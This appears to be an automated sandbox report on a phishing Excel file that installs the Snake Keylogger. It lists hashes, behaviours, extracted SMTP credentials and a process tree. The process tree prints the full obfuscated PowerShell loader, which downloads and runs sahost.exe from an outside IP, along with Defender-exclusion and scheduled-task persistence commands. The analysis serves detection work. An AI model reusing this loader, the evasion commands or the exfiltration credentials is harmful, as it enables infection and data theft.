Analysis

  • max time kernel
    101s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    05/08/2024, 11:51

General

  • Target

    Purchase Order_45020.xls

  • Size

    635KB

  • MD5

    8bb23c70321a50ccae1047cb639b816e

  • SHA1

    79358c1f386045803c6941fa3f3cf22bf6116876

  • SHA256

    f72e4cc0eef0ec4857e235dd3f92cace525b1edc104feda10ccdbc22ca3609bf

  • SHA512

    a2a698943777a8bfcc9f977eed424ec59f9a2219ab7c073c8a386ca1dad37730fdbd8072dcd56bb2989ecb9115c41ba34bb9f451d92c11f089f50f24a8db242c

  • SSDEEP

    12288:lw+LYINaL66YVYhsxsIWviBk6ZCZuGTyJYCEBeF5hQ+rXonXv6:lLOuVYhWEZuGWjnhVr

Malware Config

Extracted

Credentials

  • Protocol:
    smtp
  • Host:
    us2.smtp.mailhostbox.com
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    yUiavQX8

Extracted

Family

snakekeylogger

Credentials

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 5 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Detected phishing page
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Purchase Order_45020.xls"
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2432
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2852
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c PoWersheLL.exE -Ex Bypass -noP -W 1 -C DEvICECRedeNtIaldEpLoyMENT ; IEX($(IEx('[System.TeXt.EncOding]'+[CHAR]58+[cHar]0x3A+'uTF8.GeTStrING([sYsTeM.cOnVerT]'+[ChAR]58+[CHAr]0X3a+'fRomBase64sTrING('+[Char]34+'JEc3a3gxeSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iZXJERUZJbklUSW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElIeWd4RlpHYVgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGh4SSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEN6WHJXY3RlUWYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1VyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRdUtFT2ZkICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc3a3gxeTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNTUvc2Fob3N0LmV4ZSIsIiRlTlY6QVBQREFUQVxzYWhvc3QuZXhlIiwwLDApO1NUQVJ0LXNsZUVQKDMpO1NUYVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Fob3N0LmV4ZSI='+[CHAR]0X22+'))')))"
      2⤵
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2516
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PoWersheLL.exE -Ex Bypass -noP -W 1 -C DEvICECRedeNtIaldEpLoyMENT ; IEX($(IEx('[System.TeXt.EncOding]'+[CHAR]58+[cHar]0x3A+'uTF8.GeTStrING([sYsTeM.cOnVerT]'+[ChAR]58+[CHAr]0X3a+'fRomBase64sTrING('+[Char]34+'JEc3a3gxeSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iZXJERUZJbklUSW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElIeWd4RlpHYVgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGh4SSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEN6WHJXY3RlUWYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1VyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRdUtFT2ZkICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc3a3gxeTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNTUvc2Fob3N0LmV4ZSIsIiRlTlY6QVBQREFUQVxzYWhvc3QuZXhlIiwwLDApO1NUQVJ0LXNsZUVQKDMpO1NUYVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Fob3N0LmV4ZSI='+[CHAR]0X22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1940
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f8iokz3r.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2284
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFC79.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFC78.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3012
        • C:\Users\Admin\AppData\Roaming\sahost.exe
          "C:\Users\Admin\AppData\Roaming\sahost.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2424
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\mcuByajwuP.exe"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2224
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mcuByajwuP" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4615.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2500
          • C:\Users\Admin\AppData\Roaming\sahost.exe
            "C:\Users\Admin\AppData\Roaming\sahost.exe"
            5⤵
            • Executes dropped EXE
            • Accesses Microsoft Outlook profiles
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:1884

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NFAY0EOS\mgz8n[1].htm

    Filesize

    167B

    MD5

    0104c301c5e02bd6148b8703d19b3a73

    SHA1

    7436e0b4b1f8c222c38069890b75fa2baf9ca620

    SHA256

    446a6087825fa73eadb045e5a2e9e2adf7df241b571228187728191d961dda1f

    SHA512

    84427b656a6234a651a6d8285c103645b861a18a6c5af4abb5cb4f3beb5a4f0df4a74603a0896c7608790fbb886dc40508e92d5709f44dca05dd46c8316d15bf

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z7V06J7Q\mgz8n[1].htm

    Filesize

    5B

    MD5

    fda44910deb1a460be4ac5d56d61d837

    SHA1

    f6d0c643351580307b2eaa6a7560e76965496bc7

    SHA256

    933b971c6388d594a23fa1559825db5bec8ade2db1240aa8fc9d0c684949e8c9

    SHA512

    57dda9aa7c29f960cd7948a4e4567844d3289fa729e9e388e7f4edcbdf16bf6a94536598b4f9ff8942849f1f96bd3c00bc24a75e748a36fbf2a145f63bf904c1

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5631886D.emf

    Filesize

    3.7MB

    MD5

    5c281e92895c037ec03644dd740681f1

    SHA1

    ba678c4ec18b291a6c60f9dd028692a7963bafcd

    SHA256

    b28fde07b37bce8db20db4dff95d092ccbbbe785ba3863108bf711c33f1604a5

    SHA512

    0dc968bba522b21ff568bcc9480466fba24d4419f415dcd75cebc525bd85271e2008cac7ff45e9167da59eec36f89537490201cd822ce1d8c00a88fd0a96fe50

  • C:\Users\Admin\AppData\Local\Temp\RESFC79.tmp

    Filesize

    1KB

    MD5

    0957fbb2438cbfdd5ec421ba17617952

    SHA1

    8cf763831d7489fe76239b1169f1792573126f9d

    SHA256

    aeef2d20604b631620f3df397d31e9358e48d9b5b3a2835bac64d186bb40f5b1

    SHA512

    6eee00f0cbb3673f1ce4ba75737630262f426de0514b9d2fb561b7dec97f318c41c3842461c82dcd408f6865a629582d324917d487725f85162d379860a5eecf

  • C:\Users\Admin\AppData\Local\Temp\f8iokz3r.dll

    Filesize

    3KB

    MD5

    a89b92fc177eeb5f1bc7de9d2015d716

    SHA1

    97aab92ef6d021c181f1bb4156f9425fa3284fa7

    SHA256

    94c210a44e526f42a6295387b5d2e49ed3fb8a0ee2a9afa7dc55cea4d69e18a7

    SHA512

    eefee38c8ca916bc389e455cea53780250558de63cbc4dd3c20ac91e9214341b9aecc6eb7e70df7e7b533768857941789d26bf995a1d90520b1aba56cf152a09

  • C:\Users\Admin\AppData\Local\Temp\f8iokz3r.pdb

    Filesize

    7KB

    MD5

    eb42e181e1d6f713d48f770179e7e864

    SHA1

    37491c34d6a27ea85356cad31e8598a39a1648b6

    SHA256

    84d95e28d1355357f3a87058016dcd8be0ea173072c609483f52c91f6e66bf88

    SHA512

    a72e9e3fabc9ef13de892aa8911807591ef99424a507a264e3601cb03e165d15ac267550bb1a2df2e1d84b517034be28a5283438b8c375283ec1e1acd12661a7

  • C:\Users\Admin\AppData\Local\Temp\tmp4615.tmp

    Filesize

    1KB

    MD5

    2d2c335b67ae45d5b851b46118e273cc

    SHA1

    5a2a20e541088dce83fc4c02154564bd6cb7df33

    SHA256

    1897b5b21dacbcb3925d647ba252ed59634beece753cae4a17999b71d008962b

    SHA512

    f40e6556eef32deb31571d32691e01f46ff792c6f6ab8a6699a100161b8854b2f24aaf358748e8055ef7d9a7daa68d99adc61c93eb1d153df3814dfca24481c7

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NSWVUD8HS9E5M6ZZ2U9Y.temp

    Filesize

    7KB

    MD5

    c3a132dff88501e17ef6298c872474e1

    SHA1

    7010f595ae313d30aa65c807c13d7068c22dcade

    SHA256

    73989bfa1f2111145b297a5594dccf86bfd448a038c3e5dece7b52f60e93b40d

    SHA512

    7dec3c0ccc3d50b6a42958008f464f4b2e076d5be304e2100265f6fb00a07ba1b7d0ed606e70e5f90f22291e316d1c5b33d3e8c817a1f4568deeb6739800ef4c

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCFC78.tmp

    Filesize

    652B

    MD5

    607933dbcfb80685c4df33884dfba499

    SHA1

    e822782d351e96a63aeda2e22cb15c35e7330f68

    SHA256

    8e61fcefe5fef9e17a510be1ce331e03f7dc49139ddfd9b62a4e9eed3e5364cc

    SHA512

    d204168a871150977eaec1d8a62d783fb11c5ea29088418cb59faa1f09f800490d30b6cd35e268c792d9de7cc377f5164a48fdcf63aeec5af627cf20700a569b

  • \??\c:\Users\Admin\AppData\Local\Temp\f8iokz3r.0.cs

    Filesize

    456B

    MD5

    ccf27854f450f6e0eae3ccb817133720

    SHA1

    dd7a31a2102d26df8a678f860f619c0c478bfb6a

    SHA256

    c6e4a371ddffa99f9ed06030df8fe38e03e5d96487098f663468b5dc1edf2c08

    SHA512

    1a4ecdc8be0f2ea6fa66ca49cba83f433195503a19090cfc36f987e386b3bb275dda95deefb1e36c8988c357370a43d451c8b583a4e1699cce8849462b6125c2

  • \??\c:\Users\Admin\AppData\Local\Temp\f8iokz3r.cmdline

    Filesize

    309B

    MD5

    4d32910e25cc272776d43d856761316e

    SHA1

    40198ff9a8663393a6b20265d496d20fa83445c2

    SHA256

    b7841efa17155f268db942b50e50baf077af1d02cdb3973549a70d40582948a1

    SHA512

    925dd096268f9859cde70b2feb9b6fa40c76c43773d33ccee1047b27143ec60cdf39f5986e3ee371b3e27b006b800dcb31ae5e05df336d975304de8cb5bc1a60

  • \Users\Admin\AppData\Roaming\sahost.exe

    Filesize

    633KB

    MD5

    db2ccc4f812fabd3daac27ab5691e814

    SHA1

    28afcca9569e0e46099a2a6a30d4ef45c4113852

    SHA256

    2e70dc91594c86dcb95d4dafb804cff46ef3fc3ae02d0358b8b4be015937a9a0

    SHA512

    95157f7661de6d5fb2a06ec59ec2442790acc391ef0c3d8b5c01c0e0f92b1befcdee40394970ed3efd6f6020df0195ad6445e7401658234c704369c5a3e473f5

  • memory/1884-83-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/1884-80-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/1884-74-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/1884-76-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/1884-78-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/1884-82-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/1884-85-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/1884-87-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/2424-57-0x00000000008D0000-0x0000000000974000-memory.dmp

    Filesize

    656KB

  • memory/2424-62-0x00000000059C0000-0x0000000005A28000-memory.dmp

    Filesize

    416KB

  • memory/2424-58-0x00000000004E0000-0x00000000004F8000-memory.dmp

    Filesize

    96KB

  • memory/2424-60-0x0000000000520000-0x0000000000536000-memory.dmp

    Filesize

    88KB

  • memory/2424-59-0x0000000000500000-0x000000000050E000-memory.dmp

    Filesize

    56KB

  • memory/2432-24-0x0000000001FC0000-0x0000000001FC2000-memory.dmp

    Filesize

    8KB

  • memory/2432-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2432-61-0x00000000734CD000-0x00000000734D8000-memory.dmp

    Filesize

    44KB

  • memory/2432-1-0x00000000734CD000-0x00000000734D8000-memory.dmp

    Filesize

    44KB

  • memory/2432-89-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2432-92-0x00000000734CD000-0x00000000734D8000-memory.dmp

    Filesize

    44KB

  • memory/2852-23-0x0000000002820000-0x0000000002822000-memory.dmp

    Filesize

    8KB